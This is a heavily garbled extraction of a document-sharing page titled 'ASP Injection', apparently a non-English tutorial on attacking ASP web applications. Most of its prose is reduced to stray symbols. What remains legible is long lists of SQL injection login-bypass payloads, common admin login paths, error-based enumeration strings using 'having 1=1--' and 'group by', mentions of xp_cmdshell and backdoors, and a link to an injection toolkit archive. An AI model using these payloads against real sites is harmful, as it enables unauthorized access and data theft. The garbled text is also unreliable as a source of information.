ASP Injection

+
7 * ' 4 6
0
?# @ /
asp.net
#
asp.net
07 8 9 :
=
4 / 56
!
1
23 4
" #$ % &
) * >) *
)*
<* = ) 9 ( *
? 1
-- :
/ /
) *
0*
# :1 ;
-& <
web application
-.
'
()*
+, & "
!
/ ()*
2 5 6!
2
3
;%
<
%
'(
#$
< 1 -8
<!
ABC6
#
%0.
-
-,
1.
4%5
.
$ %
/
" 1 -=
! -.
0>
@ <xssBA
Xss
0%5
#
2 1
; E # ! ;
6 ()* $N #
N
:-
Cross site scripting

C3 :
? D 0%5
E # ;
2
1
script : G H
? F
!
9
Sql Injection BI
F Sql 8
J )
0K.
. E #
' ) < O
P !
' 5 L
M
N
!
-; H = 1
. -.
5 - . < - . -?
@ ? ?
) $ sql 4%5
Q <
http://planetsecurity.persiangig.com/My%20Sql%20Injection%20Full.rar
&0$
0$) 1
R, <- S
sql
7 8 >%
N #
!<- -?" asp

:
%? 8 >
N #
) N #
#
- . -? %
.
1
0/
! - ,
#
;
-?" %? <' )
F .7 0 ' T ; F
0 ' asp 4%5
$ %
.
login page G 6
0%5
7
N # S
!
.
$ % < Login page
#
7 password username
@ ?
?#
U , # C V T 1 -W !
/
%?
url G 6
5
! ; -? P
8
0 ' 1"
-,
/
., 8
8
1
Site.com/login.asp
Site.com/admin/login.asp
Site.com/admin.asp
And
" %P
%? Q
%?
#
%?
'
'User
'Pass
'PAss
';user
Pass;',
And
.
error
+, &
Q
: !
%?
%P
0%5 Q -
%?
+, & " %? J
-)
.
error %?
@ -
#
C
0>
ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/day/page/2211/result.asp, line 61
%
! - 1
6 ?
8
Y - 3
%.9
5
#
+, & " %?
-) error # &/
%? !Z ? ?
-?" inject
5
@ -
or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
'or''='
'or'a'='a
admin'-admin' or 1=1 -' or 1=1
' or 0=0 -admin" or "a"=a
admin" or 1=1 -admin' or 'a'='a
admin') or ('a'='a
or 0=0 -' or 0=0 #
hi' or 1=1-hi" or 1=1-hi" or "a"="a
") or ("a"="a
') or ('a'='a
" or "a"="a
hi") or ("a"="a
hi') or ('a'='a
" or 0=0 #
8 1 ; %?
?
-, V -
: 8 > \5<
., 8
/ +, &
! . U,#C 1
#? 1
F-
[ '
# 1
: %?
" or 1=1-') or ('x'='x

or'1'='1'or'1'='1'
'or'1'='1'or'1'='1
' or ' '='
' or ''='
admin" or "a"="a
admin" or 1=1 -admin' or 1=1 -admin' or 'a'='a
admin') or ('a'='a
admin") or ("a"="a
a=1)-admin'-' or 0=0 -" or 0=0 -or 0=0 -' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1-" or 1=1-or 1=1--
' or a=a-" or "a"="a

') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 -hi' or 1=1 -hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
DUMMYPASSWORD' OR 1=1 -' or 1=1-" or 1=1-or 1=1-' or 'a'='a
" or "a"="a
-, V # 1
%? - -) -' ) U , #
' or 1=1 T
#
?
DF
1
.
#
<
R,
^) 5
9 P
<
#
# %
.,
. admin 4T
-_
O
? % 9<
# <O 8
D ! .,
8 ` <
? ! 0%W 1 ;
-D
8F
#
! ) E
# 8 1
E !
-? 1
T
. ? 8 E
@ .
#
-;
%? %
., 8
%.9
C
\
<
R,
1 P 8 >
column #
#
D ! ?
0 ' ]N'
8 %?
?
%?
? D 0%W
?
table
' having 1=1--
@ ?
Mname_subject,doc
#%0
D #
<
%?
# 1
R,
-D
$ %
#%0 #
<
@<-
doc
D #
<
) #%0
mname_subject
!
9,: P
D 1
' group by Mname_subject,doc having 1=1--
[ '
<
#%0
D <
Mname_tittle,test
@ <
a,
R,
' group by Mname_subject,doc, Mname_tittle,test having 1=1--
!< O error O
@8
c*
-?
b- %
!
""!
%%&
b>
<
; e>;
'
1d
#$#$#$
) F-
., <
1 %P'
*+
fff
Q
#
D <
fff
D
@<
#%0
a,
R,
#$#$
.
fff < O g ,
<fff
N 1
# $#$
)
' 0.1* 0.1.2. *
-?
# $#$
' 0.1*
8%
.,
., 1
.,
/
[ W
:-
., H7
45 6 7 )
i
9;1 &9
@ . #%0
.00
admin inf3rnal
' 0.1*
#
3
45 6 7 -
h,
)
%W
45 6 7 )
fff
9'
%%
' 0.1*
., 1 %P'
@<' 0.1*
8 < .
fff 8
)
%%
D 1
. 1*< 1.2 *
. 1*< 1.2 * =
, .00 =
. 1*< 1.2 * =
, 0<;
,!
; '?9 =
/> -
,-
.,
/
h , &b
%
-
.00 !
0.1.2. * )
3
0.1.2. * )
fff
&9 *<1
3
.,
# @//@ -
8 1
0* *1*
h,
0.1.2. * )
fff R
0<;
& >
1.2 *
0<;
1.2 * =
0
0<;
2
0.1.2. * =
@
*
?
;
; * 02
/
!
B>>4> >6
)
C
73
C 1
union
DDE
@ F
* * 1 1;
$'
"
G<;? '
#
HI*<* '
where not in
fff
'*
<
W46 1
convert
,
F:
#%*
#""!
#""
@ -
*
?
; * 02
+
; * 02
a>
# %P
<.
*
?
B>>4> >6
A
!
B>>4> >6
9 )
-
33+
33+
33+
33+
*+
9 )
0 )
J,
$3 +
,
D3 +
JE ,
/3
1G1
33+
=& ,
33+
=& ,
$3 +
'1
J)
backdoor G 6
:
-
33+
=& ,
@ -
*1
'
?. 1*<33+
?. 1*<33+
KJ
- +
K
?. 1*<33+
KJ
?. 1*<33+
,, K
- +
K
?. 1*<33+
KJ
3 + K
?. 1*<33+
?. 1*<33+
3 +
?. 1*<33+
?. 1*<33+
: ]N'
VT
/DJ
+3+3+3+ D$ ,, K
/DJ
/DJ
' *<
3 +
KJ
/DJ
/DJ
3 +
$D/4L5 ,,
KJ
KJ
3 +
/DJ
J?3 + ,,
3 +
C
,, K
!
KJ
K
KJ
/DJ
KJ
KJ
%?
3 +
ftp G 6
- V
%26 : 1
3 +
/DJ
/DJ
/DJ?
3 +
3 +
J?3 +
-=
xp_cmdshell
@
?. 1*<33+
/
'
- +
E
J,
$3 + KD5
'
33+
H
?
=& ,
$3 +
)
$D/ E
KD5
/
$D/
., 8
@
$
N 1
@
$
%%E
E%%E
DF
%%E
E%%E
.,
$
)
E%%E$#D#/#4#L# E%
F
F$#D#/#4
E%%E$#D#/#4#L
#>#>#>#>#>#> 1
E%
@
$
D <
@
$
#%0
%? Q
D :
#%0 1
# -_%
@
$
#%0 1
!!! . 9 1 -_%
' #
"1 ,
\N
Q- 1

ASP Injection

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

ASP Injection

Uploaded by

Copyright:

Available Formats

+

Cross site scripting

!<- -?" asp

ADODB.Field error '800a0bcd'

" or 1=1-') or ('x'='x

' or a=a-" or "a"="a

' having 1=1--

' group by Mname_subject,doc having 1=1--

' group by Mname_subject,doc, Mname_tittle,test having 1=1--

' 0.1* 0.1.2. *

You might also like